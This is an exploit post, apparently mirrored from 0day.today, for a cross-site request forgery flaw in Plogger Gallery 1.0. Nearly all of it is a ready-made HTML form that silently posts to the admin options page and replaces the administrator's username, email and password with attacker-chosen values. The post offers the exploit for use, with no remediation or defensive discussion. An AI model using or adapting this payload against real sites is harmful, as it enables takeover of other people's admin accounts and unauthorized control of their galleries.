Plogger Gallery 1.0 CSRF Change Admin Password

🗓️ 20 Nov 2010 00:00:00Reported by Or4nG.M4NType

zdt🔗 0day.today👁 18 Views

Plogger Gallery 1.0 CSRF Change Admin Password by OR4NG.M4N. Exploit allows unauthorized change of admin passwor

==============================================
Plogger Gallery 1.0 CSRF Change Admin Password
==============================================

-------------------------------------------------------------------------
# Software      : PloggerGallery Version 1.0                                                                                                                            
# Author        : Or4nG.M4N                                              
# Date          : n/a   
# Dork          : Forbidden  
# Software Link : http://www.plogger.org/download/                                                                                        
-------------------------------------------------------------------------
  +---+[CSRF Change Admin Password by OR4NG.M4N]+---+
<html>                                                                    
<head>                                                                    
<title>REMOTE CSRF Change Admin Password by OR4NG.M4N</head>              
<body>
<h1>CSRF Change Admin Password by OR4NG.M4N</h1>
<form action="http://localhost/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="ro0t" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="[email protected]" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="ro0t" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="ro0t" type="hidden"></td>
</tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="Change FuCKeD" type="submit"></td>
 
--------------------------------------------------------



#  0day.today [2018-04-09]  #

20 Nov 2010 00:00Current

7.1High risk

Vulners AI Score7.1